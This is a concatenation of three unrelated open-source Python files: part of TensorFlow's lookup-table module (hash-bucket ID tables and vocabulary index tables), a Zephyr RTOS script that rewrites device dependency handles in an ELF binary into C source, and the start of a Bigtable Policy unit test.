        raise TypeError("Invalid value dtype, expected %s but got %s." %
                        (dtypes.int64, table.value_dtype))
      self._table = table
      name = name or self._table.name
    else:
      if num_oov_buckets <= 0:
        raise ValueError("oov_buckets must be > 0 if no table is supplied.")
      key_dtype = dtypes.string if key_dtype is None else key_dtype
      self._table = None
      name = name or "hash_bucket"
    if (not key_dtype.is_integer) and (dtypes.string != key_dtype):
      raise TypeError(
          "Invalid key_dtype, expected integer or string, got %s." % key_dtype)
    self._num_oov_buckets = num_oov_buckets

    if not isinstance(hasher_spec, HasherSpec):
      raise TypeError(
          "hasher_spec must be of type HasherSpec, got %s" % hasher_spec)
    self._hasher_spec = hasher_spec
    super(IdTableWithHashBuckets, self).__init__(key_dtype, dtypes.int64,
                                                 name.split("/")[-1])

  @property
  def init(self):
    """The table initialization op."""
    if self._table:
      return self._table.init
    # No underlying table: initialization is a no-op.
    with ops.name_scope(None, "init"):
      return control_flow_ops.no_op()

  @property
  def table_ref(self):
    """Returns the table_ref of the underlying table, if one exists.

    Only use the table_ref directly if you know what you are doing. The
    table_ref does not have the "hash bucket" functionality, as that is
    provided by this class.

    One possible use of the table_ref is subtokenization, i.e. ops which
    dynamically decompose tokens into subtokens based on the contents of the
    table_ref.

    Returns:
      the underlying table_ref, or None if there is no underlying table
    """
    if self._table is not None:
      return self._table.table_ref
    return None

  def size(self, name=None):
    """Compute the number of elements in this table."""
    with ops.name_scope(name, "%s_Size" % self.name) as scope:
      if self._table:
        tsize = self._table.size(scope)
      else:
        tsize = ops.convert_to_tensor(0, dtype=dtypes.int64)
      # Total size includes the out-of-vocabulary buckets.
      return tsize + self._num_oov_buckets

  def _get_string_to_hash_bucket_fn(self, hasher_spec):
    """Returns the string_to_hash_bucket op to use based on `hasher_spec`."""
    if not isinstance(hasher_spec, HasherSpec):
      raise TypeError("hasher_spec must be of type HasherSpec %s" % hasher_spec)
    if hasher_spec.hasher == "fasthash":
      return string_ops.string_to_hash_bucket_fast
    if hasher_spec.hasher == "legacy":
      return string_ops.string_to_hash_bucket
    if hasher_spec.hasher == "stronghash":
      return functools.partial(
          string_ops.string_to_hash_bucket_strong, key=hasher_spec.key)
    raise ValueError("Unknown hasher %s" % hasher_spec.hasher)

  def lookup(self, keys, name=None):
    """Looks up `keys` in the table, outputs the corresponding values.

    It assigns out-of-vocabulary keys to buckets based in their hashes.

    Args:
      keys: Keys to look up. May be either a `SparseTensor` or dense `Tensor`.
      name: Optional name for the op.

    Returns:
      A `SparseTensor` if keys are sparse, otherwise a dense `Tensor`.

    Raises:
      TypeError: when `keys` doesn't match the table key data type.
    """
    if keys.dtype.base_dtype != self._key_dtype:
      raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
                      (self._key_dtype, keys.dtype))
    values = keys
    if isinstance(keys, sparse_tensor.SparseTensor):
      values = keys.values
    if self._table and (self._table.key_dtype.base_dtype == dtypes.int64):
      values = math_ops.to_int64(values)

    if self._num_oov_buckets == 0:
      ids = self._table.lookup(values, name=name)
    else:
      # TODO(yleon): Consider moving this functionality to its own kernel.
      with ops.name_scope(name, "%s_Lookup" % self.name) as scope:
        str_to_hash_bucket = self._get_string_to_hash_bucket_fn(
            self._hasher_spec)
        buckets = str_to_hash_bucket(
            _as_string(values),
            num_buckets=self._num_oov_buckets,
            name="hash_bucket")
        if self._table:
          ids = self._table.lookup(values)
          # Shift OOV bucket ids past the in-vocabulary id range.
          buckets = math_ops.add(buckets, self._table.size())
          is_id_non_default = math_ops.not_equal(ids, self._table.default_value)
          ids = array_ops.where(is_id_non_default, ids, buckets, name=scope)
        else:
          ids = buckets
    if isinstance(keys, sparse_tensor.SparseTensor):
      return sparse_tensor.SparseTensor(keys.indices, ids, keys.dense_shape)
    return ids
def index_table_from_file(vocabulary_file=None,
                          num_oov_buckets=0,
                          vocab_size=None,
                          default_value=-1,
                          hasher_spec=FastHashSpec,
                          key_dtype=dtypes.string,
                          name=None,
                          key_column_index=TextFileIndex.WHOLE_LINE,
                          value_column_index=TextFileIndex.LINE_NUMBER,
                          delimiter="\t"):
  """Returns a lookup table that converts a string tensor into int64 IDs.

  This operation constructs a lookup table to convert tensor of strings into
  int64 IDs. The mapping can be initialized from a vocabulary file specified in
  `vocabulary_file`, where the whole line is the key and the zero-based line
  number is the ID.

  Any lookup of an out-of-vocabulary token will return a bucket ID based on its
  hash if `num_oov_buckets` is greater than zero. Otherwise it is assigned the
  `default_value`.
  The bucket ID range is
  `[vocabulary size, vocabulary size + num_oov_buckets - 1]`.

  The underlying table must be initialized by calling
  `tf.tables_initializer.run()` or `table.init.run()` once.

  To specify multi-column vocabulary files, use key_column_index and
  value_column_index and delimiter.

  - TextFileIndex.LINE_NUMBER means use the line number starting from zero,
    expects data type int64.
  - TextFileIndex.WHOLE_LINE means use the whole line content, expects data
    type string.
  - A value >=0 means use the index (starting at zero) of the split line based
    on `delimiter`.

  Sample Usages:

  If we have a vocabulary file "test.txt" with the following content:

  ```
  emerson
  lake
  palmer
  ```

  ```python
  features = tf.constant(["emerson", "lake", "and", "palmer"])
  table = tf.contrib.lookup.index_table_from_file(
      vocabulary_file="test.txt", num_oov_buckets=1)
  ids = table.lookup(features)
  ...
  tf.tables_initializer().run()

  ids.eval()  ==> [0, 1, 3, 2]  # where 3 is the out-of-vocabulary bucket
  ```

  Args:
    vocabulary_file: The vocabulary filename, may be a constant scalar
      `Tensor`.
    num_oov_buckets: The number of out-of-vocabulary buckets.
    vocab_size: Number of the elements in the vocabulary, if known.
    default_value: The value to use for out-of-vocabulary feature values.
      Defaults to -1.
    hasher_spec: A `HasherSpec` to specify the hash function to use for
      assignation of out-of-vocabulary buckets.
    key_dtype: The `key` data type.
    name: A name for this op (optional).
    key_column_index: The column index from the text file to get the `key`
      values from. The default is to use the whole line content.
    value_column_index: The column index from the text file to get the `value`
      values from. The default is to use the line number, starting from zero.
    delimiter: The delimiter to separate fields in a line.

  Returns:
    The lookup table to map a `key_dtype` `Tensor` to index `int64` `Tensor`.

  Raises:
    ValueError: If `vocabulary_file` is not set.
    ValueError: If `num_oov_buckets` is negative or `vocab_size` is not greater
      than zero.
  """
  # A None or empty-string filename cannot produce a table; tensor-valued
  # filenames are exempt because their value is only known at run time.
  if vocabulary_file is None or (
      isinstance(vocabulary_file, six.string_types) and not vocabulary_file):
    raise ValueError("vocabulary_file must be specified and must not be empty.")
  if num_oov_buckets < 0:
    raise ValueError("num_oov_buckets must be greater or equal than 0, got %d."
                     % num_oov_buckets)
  if vocab_size is not None and vocab_size < 1:
    # Try to recover a printable filename for the error message.
    vocab_file_value = vocabulary_file
    if isinstance(vocabulary_file, ops.Tensor):
      vocab_file_value = tensor_util.constant_value(vocabulary_file) or "?"
    raise ValueError("vocab_size must be greater than 0, got %d. "
                     "vocabulary_file: %s" % (vocab_size, vocab_file_value))
  if (not key_dtype.is_integer) and (dtypes.string != key_dtype.base_dtype):
    raise TypeError("Only integer and string keys are supported.")

  with ops.name_scope(name, "string_to_index") as feat_to_id_scope:
    table = None
    shared_name = ""
    with ops.name_scope(None, "hash_table") as hash_table_scope:
      if vocab_size:
        # Keep the shared_name:
        # <table_type>_<filename>_<vocab_size>_<key_index>_<value_index>
        shared_name = "hash_table_%s_%d_%s_%s" % (vocabulary_file, vocab_size,
                                                  key_column_index,
                                                  value_column_index)
      else:
        # Keep the shared_name
        # <table_type>_<filename>_<key_index>_<value_index>
        shared_name = "hash_table_%s_%s_%s" % (vocabulary_file,
                                               key_column_index,
                                               value_column_index)
      # Integer keys are normalized to int64 for the file-backed table.
      init = TextFileIdTableInitializer(
          vocabulary_file,
          vocab_size=vocab_size,
          key_dtype=dtypes.int64 if key_dtype.is_integer else key_dtype,
          name="table_init",
          key_column_index=key_column_index,
          value_column_index=value_column_index,
          delimiter=delimiter)

      table = HashTable(
          init, default_value, shared_name=shared_name, name=hash_table_scope)
    if num_oov_buckets:
      # Wrap the file-backed table so OOV keys hash into extra buckets.
      table = IdTableWithHashBuckets(
          table,
          num_oov_buckets=num_oov_buckets,
          hasher_spec=hasher_spec,
          name=feat_to_id_scope,
          key_dtype=key_dtype)

    return table
def index_table_from_tensor(vocabulary_list,
                            num_oov_buckets=0,
                            default_value=-1,
                            hasher_spec=FastHashSpec,
                            dtype=dtypes.string,
                            name=None):
  """Returns a lookup table that converts a string tensor into int64 IDs.

  This operation constructs a lookup table to convert tensor of strings into
  int64 IDs. The mapping can be initialized from a string `vocabulary_list` 1-D
  tensor where each element is a key and corresponding index within the tensor
  is the value.

  Any lookup of an out-of-vocabulary token will return a bucket ID based on its
  hash if `num_oov_buckets` is greater than zero. Otherwise it is assigned the
  `default_value`.
  The bucket ID range is
  `[vocabulary size, vocabulary size + num_oov_buckets - 1]`.

  The underlying table must be initialized by calling
  `tf.tables_initializer.run()` or `table.init.run()` once.

  Elements in `vocabulary_list` cannot have duplicates, otherwise when
  executing the table initializer op, it will throw a
  `FailedPreconditionError`.

  Sample Usages:

  ```python
  vocabulary_list = tf.constant(["emerson", "lake", "palmer"])
  table = tf.contrib.lookup.index_table_from_tensor(
      vocabulary_list=vocabulary_list, num_oov_buckets=1, default_value=-1)
  features = tf.constant(["emerson", "lake", "and", "palmer"])
  ids = table.lookup(features)
  ...
  tf.tables_initializer().run()
  ids.eval()  ==> [0, 1, 4, 2]
  ```

  Args:
    vocabulary_list: A 1-D `Tensor` that specifies the mapping of keys to
      indices. The type of this object must be castable to `dtype`.
    num_oov_buckets: The number of out-of-vocabulary buckets.
    default_value: The value to use for out-of-vocabulary feature values.
      Defaults to -1.
    hasher_spec: A `HasherSpec` to specify the hash function to use for
      assignment of out-of-vocabulary buckets.
    dtype: The type of values passed to `lookup`. Only string and integers are
      supported.
    name: A name for this op (optional).

  Returns:
    The lookup table to map an input `Tensor` to index `int64` `Tensor`.

  Raises:
    ValueError: If `vocabulary_list` is invalid.
    ValueError: If `num_oov_buckets` is negative.
  """
  if vocabulary_list is None:
    raise ValueError("vocabulary_list must be specified.")
  if num_oov_buckets < 0:
    raise ValueError("num_oov_buckets must be greater or equal than 0, got %d."
                     % num_oov_buckets)
  if (not dtype.is_integer) and (dtypes.string != dtype.base_dtype):
    raise TypeError("Only integer and string keys are supported.")
  with ops.name_scope(name, "string_to_index") as feat_to_id_scope:
    keys = ops.convert_to_tensor(vocabulary_list)
    # The vocabulary tensor's integer-ness must agree with the requested
    # lookup dtype; for non-integer lookups the base dtypes must match exactly.
    if keys.dtype.is_integer != dtype.is_integer:
      raise ValueError("Expected %s, got %s." %
                       ("integer"
                        if dtype.is_integer else "non-integer", keys.dtype))
    if (not dtype.is_integer) and (keys.dtype.base_dtype != dtype):
      raise ValueError("Expected %s, got %s." % (dtype, keys.dtype))
    # Table values are simply the positions 0..N-1 of each vocabulary entry.
    num_elements = array_ops.size(keys)
    values = math_ops.to_int64(math_ops.range(num_elements))
    # Unlike index_table_from_file, no shared_name is derived here.
    shared_name = ""
    with ops.name_scope(None, "hash_table") as hash_table_scope:
      # Integer keys are widened to int64 for the underlying table.
      table_keys = math_ops.to_int64(keys) if keys.dtype.is_integer else keys
      init = KeyValueTensorInitializer(
          table_keys,
          values,
          table_keys.dtype.base_dtype,
          dtypes.int64,
          name="table_init")
      table = HashTable(
          init, default_value, shared_name=shared_name, name=hash_table_scope)
    if num_oov_buckets:
      # Wrap the table so OOV tokens hash into the extra bucket range.
      table = IdTableWithHashBuckets(
          table,
          num_oov_buckets=num_oov_buckets,
          hasher_spec=hasher_spec,
          name=feat_to_id_scope,
          key_dtype=dtype)
    return table
def index_to_string_table_from_file(vocabulary_file,
                                    vocab_size=None,
                                    default_value="UNK",
                                    name=None,
                                    key_column_index=TextFileIndex.LINE_NUMBER,
                                    value_column_index=TextFileIndex.WHOLE_LINE,
                                    delimiter="\t"):
  """Returns a lookup table that maps a `Tensor` of indices into strings.

  This operation constructs a lookup table to map int64 indices into string
  values. The table is initialized from a vocabulary file specified in
  `vocabulary_file`, where the whole line is the value and the
  zero-based line number is the index.

  Any input which does not have a corresponding index in the vocabulary file
  (an out-of-vocabulary entry) is assigned the `default_value`.

  The underlying table must be initialized by calling
  `tf.tables_initializer.run()` or `table.init.run()` once.

  To specify multi-column vocabulary files, use key_column_index and
  value_column_index and delimiter.

  - TextFileIndex.LINE_NUMBER means use the line number starting from zero,
    expects data type int64.
  - TextFileIndex.WHOLE_LINE means use the whole line content, expects data
    type string.
  - A value >=0 means use the index (starting at zero) of the split line based
    on `delimiter`.

  Sample Usages:

  If we have a vocabulary file "test.txt" with the following content:

  ```
  emerson
  lake
  palmer
  ```

  ```python
  indices = tf.constant([1, 5], tf.int64)
  table = tf.contrib.lookup.index_to_string_table_from_file(
      vocabulary_file="test.txt", default_value="UNKNOWN")
  values = table.lookup(indices)
  ...
  tf.tables_initializer().run()
  values.eval() ==> ["lake", "UNKNOWN"]
  ```

  Args:
    vocabulary_file: The vocabulary filename, may be a constant scalar `Tensor`.
    vocab_size: Number of the elements in the vocabulary, if known.
    default_value: The value to use for out-of-vocabulary indices.
    name: A name for this op (optional).
    key_column_index: The column index from the text file to get the `key`
      values from. The default is to use the line number, starting from zero.
    value_column_index: The column index from the text file to get the `value`
      values from. The default is to use the whole line content.
    delimiter: The delimiter to separate fields in a line.

  Returns:
    The lookup table mapping `int64` index `Tensor`s to string values.

  Raises:
    ValueError: when `vocabulary_file` is empty.
    ValueError: when `vocab_size` is invalid.
  """
  # An empty string (or empty string Tensor value) is as invalid as None.
  if vocabulary_file is None or (
      isinstance(vocabulary_file, six.string_types) and not vocabulary_file):
    raise ValueError("vocabulary_file must be specified and must not be empty.")
  if vocab_size is not None and vocab_size < 1:
    raise ValueError("vocab_size must be greater than 0, got %d." % vocab_size)
  with ops.name_scope(name, "index_to_string") as scope:
    shared_name = ""
    if vocab_size:
      # Keep a shared_name
      # <table_type>_<filename>_<vocab_size>_<key_index>_<value_index>
      shared_name = "hash_table_%s_%d_%s_%s" % (vocabulary_file, vocab_size,
                                                key_column_index,
                                                value_column_index)
    else:
      # Keep a shared_name <table_type>_<filename>_<key_index>_<value_index>
      shared_name = "hash_table_%s_%s_%s" % (vocabulary_file, key_column_index,
                                             value_column_index)
    init = TextFileStringTableInitializer(
        vocabulary_file,
        vocab_size=vocab_size,
        name="table_init",
        key_column_index=key_column_index,
        value_column_index=value_column_index,
        delimiter=delimiter)

    # TODO(yleon): Use a more efficient structure.
    return HashTable(init, default_value, shared_name=shared_name, name=scope)
def index_to_string_table_from_tensor(vocabulary_list,
                                      default_value="UNK",
                                      name=None):
  """Returns a lookup table that maps a `Tensor` of indices into strings.

  This operation constructs a lookup table to map int64 indices into string
  values. The mapping is initialized from a string `vocabulary_list` 1-D
  `Tensor` where each element is a value and the corresponding index within
  the tensor is the key.

  Any input which does not have a corresponding index in `vocabulary_list`
  (an out-of-vocabulary entry) is assigned the `default_value`.

  The underlying table must be initialized by calling
  `tf.tables_initializer.run()` or `table.init.run()` once.

  Elements in `vocabulary_list` cannot have duplicates, otherwise when
  executing the table initializer op, it will throw a
  `FailedPreconditionError`.

  Sample Usages:

  ```python
  vocabulary_list = tf.constant(["emerson", "lake", "palmer"])
  indices = tf.constant([1, 5], tf.int64)
  table = tf.contrib.lookup.index_to_string_table_from_tensor(
      vocabulary_list, default_value="UNKNOWN")
  values = table.lookup(indices)
  ...
  tf.tables_initializer().run()
  values.eval() ==> ["lake", "UNKNOWN"]
  ```

  Args:
    vocabulary_list: A 1-D string `Tensor` that specifies the strings to map
      from indices.
    default_value: The value to use for out-of-vocabulary indices.
    name: A name for this op (optional).

  Returns:
    The lookup table mapping `int64` index `Tensor`s to string values.

  Raises:
    ValueError: when `vocabulary_list` is not set.
  """
  if vocabulary_list is None:
    raise ValueError("vocabulary_list must be specified.")
  with ops.name_scope(name, "index_to_string") as scope:
    vocabulary_list = ops.convert_to_tensor(vocabulary_list, dtypes.string)
    # Keys are the positions 0..N-1; values are the vocabulary strings.
    num_elements = array_ops.size(vocabulary_list)
    keys = math_ops.to_int64(math_ops.range(num_elements))
    shared_name = ""
    init = KeyValueTensorInitializer(
        keys, vocabulary_list, dtypes.int64, dtypes.string, name="table_init")
    # TODO(yleon): Use a more efficient structure.
    return HashTable(init, default_value, shared_name=shared_name, name=scope)
# Lookup-table ops have no defined gradients; register every variant
# (V1 and V2) as non-differentiable so gradient construction rejects
# them explicitly instead of producing silently-wrong results.
for _lookup_op_name in (
    "LookupTableFind",
    "LookupTableFindV2",
    "LookupTableInsert",
    "LookupTableInsertV2",
    "LookupTableSize",
    "LookupTableSizeV2",
    "HashTable",
    "HashTableV2",
    "InitializeTable",
    "InitializeTableV2",
    "InitializeTableFromTextFile",
    "InitializeTableFromTextFileV2",
    "MutableDenseHashTable",
    "MutableDenseHashTableV2",
    "MutableHashTable",
    "MutableHashTableV2",
    "MutableHashTableOfTensors",
    "MutableHashTableOfTensorsV2",
):
  ops.NotDifferentiable(_lookup_op_name)
| |
#!/usr/bin/env python3
#
# Copyright (c) 2017 Intel Corporation
# Copyright (c) 2020 Nordic Semiconductor NA
#
# SPDX-License-Identifier: Apache-2.0
"""Translate generic handles into ones optimized for the application.
Immutable device data includes information about dependencies,
e.g. that a particular sensor is controlled through a specific I2C bus
and that it signals events on a pin of a specific GPIO controller.
This information is encoded in the first-pass binary using identifiers
derived from the devicetree. This script extracts those identifiers
and replaces them with ones optimized for use with the devices
actually present.
For example the sensor might have a first-pass handle defined by its
devicetree ordinal 52, with the I2C driver having ordinal 24 and the
GPIO controller ordinal 14. The runtime ordinal is the index of the
corresponding device in the static devicetree array, which might be 6,
5, and 3, respectively.
The output is a C source file that provides alternative definitions
for the array contents referenced from the immutable device objects.
In the final link these definitions supersede the ones in the
driver-specific object file.
"""
import sys
import argparse
import os
import struct
import pickle
from distutils.version import LooseVersion
import elftools
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
import elftools.elf.enums
# This is needed to load edt.pickle files.
sys.path.append(os.path.join(os.path.dirname(__file__),
'dts', 'python-devicetree', 'src'))
from devicetree import edtlib # pylint: disable=unused-import
if LooseVersion(elftools.__version__) < LooseVersion('0.24'):
sys.exit("pyelftools is out of date, need version 0.24 or later")
# Short script name used to prefix all diagnostic output.
scr = os.path.basename(sys.argv[0])

def debug(text):
    """Write *text* to stdout, prefixed with the script name, but only
    when --verbose was requested (see parse_args)."""
    if args.verbose:
        sys.stdout.write("%s: %s\n" % (scr, text))
def parse_args():
    """Parse command-line options into the module-global ``args``.

    Side effects: may call sys.exit() when ZEPHYR_BASE cannot be
    determined, and prepends the Zephyr scripts/dts directory to
    sys.path.
    """
    global args

    parser = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter)

    parser.add_argument("-k", "--kernel", required=True,
                        help="Input zephyr ELF binary")
    parser.add_argument("-o", "--output-source", required=True,
                        help="Output source file")
    parser.add_argument("-v", "--verbose", action="store_true",
                        help="Print extra debugging information")
    parser.add_argument("-z", "--zephyr-base",
                        help="Path to current Zephyr base. If this argument \
                        is not provided the environment will be checked for \
                        the ZEPHYR_BASE environment variable.")
    parser.add_argument("-s", "--start-symbol", required=True,
                        help="Symbol name of the section which contains the \
                        devices. The symbol name must point to the first \
                        device in that section.")
    args = parser.parse_args()

    # A VERBOSE environment variable forces --verbose on.
    if "VERBOSE" in os.environ:
        args.verbose = 1

    # The flag takes precedence over the environment variable.
    ZEPHYR_BASE = args.zephyr_base or os.getenv("ZEPHYR_BASE")
    if ZEPHYR_BASE is None:
        sys.exit("-z / --zephyr-base not provided. Please provide "
                 "--zephyr-base or set ZEPHYR_BASE in environment")

    sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/dts"))
def symbol_data(elf, sym):
    """Return the raw bytes occupied by *sym* in *elf*.

    Scans the ELF sections for the one whose address range wholly
    contains the symbol and slices its data out.  Returns None when no
    section covers the symbol.
    """
    addr = sym.entry.st_value
    # Renamed from 'len' in the original, which shadowed the builtin.
    size = sym.entry.st_size
    for section in elf.iter_sections():
        start = section['sh_addr']
        end = start + section['sh_size']
        if start <= addr and (addr + size) <= end:
            offset = addr - start
            return bytes(section.data()[offset:offset + size])
    # Explicit (was an implicit fall-through in the original).
    return None
def symbol_handle_data(elf, sym):
    """Unpack *sym*'s data as an array of 16-bit signed device handles.

    Returns a tuple of host-order shorts, or None when the symbol's
    data cannot be located (or is empty).
    """
    data = symbol_data(elf, sym)
    if not data:
        return None
    endian = "<" if elf.little_endian else ">"
    # Use integer division: the original 'len(data) / 2' produced a float
    # and relied on '%u' silently truncating it.
    return struct.unpack("%s%dh" % (endian, len(data) // 2), data)
# These match the corresponding constants in <device.h>
DEVICE_HANDLE_SEP = -32768
DEVICE_HANDLE_ENDS = 32767

# Sentinel handle values that must be emitted as their C token rather
# than a numeric literal.
_SPECIAL_HANDLE_NAMES = {
    DEVICE_HANDLE_SEP: "DEVICE_HANDLE_SEP",
    DEVICE_HANDLE_ENDS: "DEVICE_HANDLE_ENDS",
    0: "DEVICE_HANDLE_NULL",
}

def handle_name(hdl):
    """Return the C source token for a device handle value."""
    name = _SPECIAL_HANDLE_NAMES.get(hdl)
    return name if name is not None else str(int(hdl))
class Device:
    """
    Represents information about a device object and its references to other objects.
    """
    def __init__(self, elf, ld_constants, sym, addr):
        # elf: the ELFFile being scanned; ld_constants: linker-provided
        # struct offsets/sizes; sym: this device's ELF symbol; addr: its
        # load address.
        self.elf = elf
        self.ld_constants = ld_constants
        self.sym = sym
        self.addr = addr
        # Point to the handles instance associated with the device;
        # assigned by correlating the device struct handles pointer
        # value with the addr of a Handles instance.
        self.__handles = None
    @property
    def obj_handles(self):
        """
        Returns the value from the device struct handles field, pointing to the
        array of handles for devices this device depends on.
        """
        # Lazily unpack the pointer on first access, then cache it.
        if self.__handles is None:
            data = symbol_data(self.elf, self.sym)
            # NOTE(review): 'format' shadows the builtin; harmless here.
            format = "<" if self.elf.little_endian else ">"
            # Pointer width depends on ELF class: 32-bit -> 'I', 64-bit -> 'Q'.
            if self.elf.elfclass == 32:
                format += "I"
                size = 4
            else:
                format += "Q"
                size = 8
            offset = self.ld_constants["_DEVICE_STRUCT_HANDLES_OFFSET"]
            self.__handles = struct.unpack(format, data[offset:offset + size])[0]
        return self.__handles
class Handles:
    """Record for one __devicehdl_* symbol: its ELF symbol, address,
    decoded handle array, and the devicetree node it belongs to (if any)."""

    def __init__(self, sym, addr, handles, node):
        # Raw inputs captured during the ELF scan.
        self.node = node
        self.handles = handles
        self.addr = addr
        self.sym = sym
        # Populated later while post-processing the dependency graph.
        self.dep_ord = None
        self.dev_deps = None
        self.ext_deps = None
def main():
    """Read the pass-1 ELF, rewrite device handle arrays, and emit the
    pass-2 C source file with optimized handles."""
    parse_args()

    assert args.kernel, "--kernel ELF required to extract data"
    elf = ELFFile(open(args.kernel, "rb"))

    # The devicetree model is pickled next to the kernel by an earlier
    # build step.
    edtser = os.path.join(os.path.split(args.kernel)[0], "edt.pickle")
    with open(edtser, 'rb') as f:
        edt = pickle.load(f)

    devices = []
    handles = []
    # Leading _ are stripped from the stored constant key
    want_constants = set([args.start_symbol,
                          "_DEVICE_STRUCT_SIZEOF",
                          "_DEVICE_STRUCT_HANDLES_OFFSET"])
    ld_constants = dict()

    # Scan every symbol table for linker constants, device objects
    # (__device_*) and their handle arrays (__devicehdl_*).
    for section in elf.iter_sections():
        if isinstance(section, SymbolTableSection):
            for sym in section.iter_symbols():
                if sym.name in want_constants:
                    ld_constants[sym.name] = sym.entry.st_value
                    continue
                if sym.entry.st_info.type != 'STT_OBJECT':
                    continue
                if sym.name.startswith("__device"):
                    addr = sym.entry.st_value
                    if sym.name.startswith("__device_"):
                        devices.append(Device(elf, ld_constants, sym, addr))
                        debug("device %s" % (sym.name,))
                    elif sym.name.startswith("__devicehdl_"):
                        hdls = symbol_handle_data(elf, sym)

                        # The first element of the hdls array is the dependency
                        # ordinal of the device, which identifies the devicetree
                        # node.
                        node = edt.dep_ord2node[hdls[0]] if (hdls and hdls[0] != 0) else None
                        handles.append(Handles(sym, addr, hdls, node))
                        debug("handles %s %d %s" % (sym.name, hdls[0] if hdls else -1, node))

    assert len(want_constants) == len(ld_constants), "linker map data incomplete"

    devices = sorted(devices, key = lambda k: k.sym.entry.st_value)

    device_start_addr = ld_constants[args.start_symbol]
    device_size = 0

    assert len(devices) == len(handles), 'mismatch devices and handles'

    used_nodes = set()
    # Pair every Handles record with its Device (by matching the device
    # struct's handles pointer to the handle array address), compute the
    # runtime handle for each device, and split the raw handle array
    # into device deps and external (injected) deps.
    for handle in handles:
        handle.device = None
        for device in devices:
            if handle.addr == device.obj_handles:
                handle.device = device
                break
        device = handle.device
        assert device, 'no device for %s' % (handle.sym.name,)
        device.handle = handle
        if device_size == 0:
            device_size = device.sym.entry.st_size

        # The device handle is one plus the ordinal of this device in
        # the device table.
        device.dev_handle = 1 + int((device.sym.entry.st_value - device_start_addr) / device_size)
        debug("%s dev ordinal %d" % (device.sym.name, device.dev_handle))

        n = handle.node
        if n is not None:
            debug("%s dev ordinal %d\n\t%s" % (n.path, device.dev_handle, ' ; '.join(str(_) for _ in handle.handles)))
            used_nodes.add(n)
            n.__device = device
        else:
            debug("orphan %d" % (device.dev_handle,))

        # Walk the raw array: entries before DEVICE_HANDLE_SEP are device
        # dependencies, entries after it are external dependencies, and
        # DEVICE_HANDLE_ENDS terminates the list.
        hv = handle.handles
        hvi = 1
        handle.dev_deps = []
        handle.ext_deps = []
        deps = handle.dev_deps
        while hvi < len(hv):
            h = hv[hvi]
            if h == DEVICE_HANDLE_ENDS:
                break
            if h == DEVICE_HANDLE_SEP:
                deps = handle.ext_deps
            else:
                deps.append(h)
                # NOTE(review): this rebinding of n looks vestigial; n is not
                # read again before being reassigned on the next handle.
                n = edt
            hvi += 1

    # Compute the dependency graph induced from the full graph restricted to the
    # the nodes that exist in the application. Note that the edges in the
    # induced graph correspond to paths in the full graph.
    root = edt.dep_ord2node[0]
    assert root not in used_nodes

    for sn in used_nodes:
        # Where we're storing the final set of nodes: these are all used
        sn.__depends = set()

        deps = set(sn.depends_on)
        debug("\nNode: %s\nOrig deps:\n\t%s" % (sn.path, "\n\t".join([dn.path for dn in deps])))
        while len(deps) > 0:
            dn = deps.pop()
            if dn in used_nodes:
                # this is used
                sn.__depends.add(dn)
            elif dn != root:
                # forward the dependency up one level
                for ddn in dn.depends_on:
                    deps.add(ddn)
        debug("final deps:\n\t%s\n" % ("\n\t".join([ _dn.path for _dn in sn.__depends])))

    # Emit the pass-2 source: one replacement handle array per device,
    # placed in a dedicated section so it supersedes the pass-1 copy at
    # final link.
    with open(args.output_source, "w") as fp:
        fp.write('#include <device.h>\n')
        fp.write('#include <toolchain.h>\n')

        for dev in devices:
            hs = dev.handle
            assert hs, "no hs for %s" % (dev.sym.name,)
            dep_paths = []
            ext_paths = []
            hdls = []

            sn = hs.node
            if sn:
                hdls.extend(dn.__device.dev_handle for dn in sn.__depends)
                for dn in sn.depends_on:
                    if dn in sn.__depends:
                        dep_paths.append(dn.path)
                    else:
                        dep_paths.append('(%s)' % dn.path)
            if len(hs.ext_deps) > 0:
                # TODO: map these to something smaller?
                ext_paths.extend(map(str, hs.ext_deps))
                hdls.append(DEVICE_HANDLE_SEP)
                hdls.extend(hs.ext_deps)

            # When CONFIG_USERSPACE is enabled the pre-built elf is
            # also used to get hashes that identify kernel objects by
            # address. We can't allow the size of any object in the
            # final elf to change. We also must make sure at least one
            # DEVICE_HANDLE_ENDS is inserted.
            padding = len(hs.handles) - len(hdls)
            assert padding > 0, \
                (f"device {dev.sym.name}: "
                 "linker pass 1 left no room to insert DEVICE_HANDLE_ENDS. "
                 "To work around, increase CONFIG_DEVICE_HANDLE_PADDING by " +
                 str(1 + (-padding)))
            while padding > 0:
                hdls.append(DEVICE_HANDLE_ENDS)
                padding -= 1
            assert len(hdls) == len(hs.handles), "%s handle overflow" % (dev.sym.name,)

            lines = [
                '',
                '/* %d : %s:' % (dev.dev_handle, (sn and sn.path) or "sysinit"),
            ]
            if len(dep_paths) > 0:
                lines.append(' * - %s' % ('\n * - '.join(dep_paths)))
            if len(ext_paths) > 0:
                lines.append(' * + %s' % ('\n * + '.join(ext_paths)))

            lines.extend([
                ' */',
                'const device_handle_t __aligned(2) __attribute__((__section__(".__device_handles_pass2")))',
                '%s[] = { %s };' % (hs.sym.name, ', '.join([handle_name(_h) for _h in hdls])),
                '',
            ])

            fp.write('\n'.join(lines))
# Script entry point; main() is also importable for testing.
if __name__ == "__main__":
    main()
| |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestPolicy(unittest.TestCase):
    """Unit tests for google.cloud.bigtable.policy.Policy."""

    @staticmethod
    def _get_target_class():
        from google.cloud.bigtable.policy import Policy

        return Policy

    def _make_one(self, *args, **kw):
        return self._get_target_class()(*args, **kw)

    def _check_empty_bindings(self, policy):
        # Each role-convenience getter should report no members at all.
        nothing = frozenset()
        self.assertEqual(policy.bigtable_admins, nothing)
        self.assertEqual(policy.bigtable_readers, nothing)
        self.assertEqual(policy.bigtable_users, nothing)
        self.assertEqual(policy.bigtable_viewers, nothing)

    def test_ctor_defaults(self):
        policy = self._make_one()
        self.assertIsNone(policy.etag)
        self.assertIsNone(policy.version)
        self._check_empty_bindings(policy)
        self.assertEqual(len(policy), 0)
        self.assertEqual(dict(policy), {})

